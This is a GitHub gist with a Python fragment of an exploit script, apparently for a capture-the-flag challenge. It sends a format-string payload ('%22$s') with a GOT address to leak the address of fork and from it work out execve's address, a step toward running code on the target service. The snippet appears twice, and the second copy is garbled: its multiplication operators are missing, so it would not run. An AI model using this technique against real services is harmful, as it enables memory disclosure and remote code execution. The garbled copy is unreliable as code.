vanhoefm/gist:5305882

## gistfile1.py
# Step 1c--- Get the address of execve
LEAKFORKADDR = dword_to_bitstring(location_got_fork)
LEAKFORKADDR += "%22$s:ENFORK:"

nc.read_until("Your choice: ")
nc.write("1" + "\n")

nc.read_until("Insert name: ")
nc.write(LEAKFORKADDR+"A"*(100-len(LEAKFORKADDR))+"\x01\x01"*4+"\xFF\xFF"+"\n")
nc.read_until("Uranium in nuclear plant \"")

addrfork = bitstring_to_dword(nc.read_until(":ENFORK:")[4:-8])
addrexecve = addrfork + 0x320
print "[+] Address of fork           :", hex(addrfork)
print "    > Address of execve       :", hex(addrexecve)
	# Step 1c--- Get the address of execve
	LEAKFORKADDR = dword_to_bitstring(location_got_fork)
	LEAKFORKADDR += "%22$s:ENFORK:"

	nc.read_until("Your choice: ")
	nc.write("1" + "\n")

	nc.read_until("Insert name: ")
	nc.write(LEAKFORKADDR+"A"(100-len(LEAKFORKADDR))+"\x01\x01"4+"\xFF\xFF"+"\n")
	nc.read_until("Uranium in nuclear plant \"")

	addrfork = bitstring_to_dword(nc.read_until(":ENFORK:")[4:-8])
	addrexecve = addrfork + 0x320
	print "[+] Address of fork :", hex(addrfork)
	print " > Address of execve :", hex(addrexecve)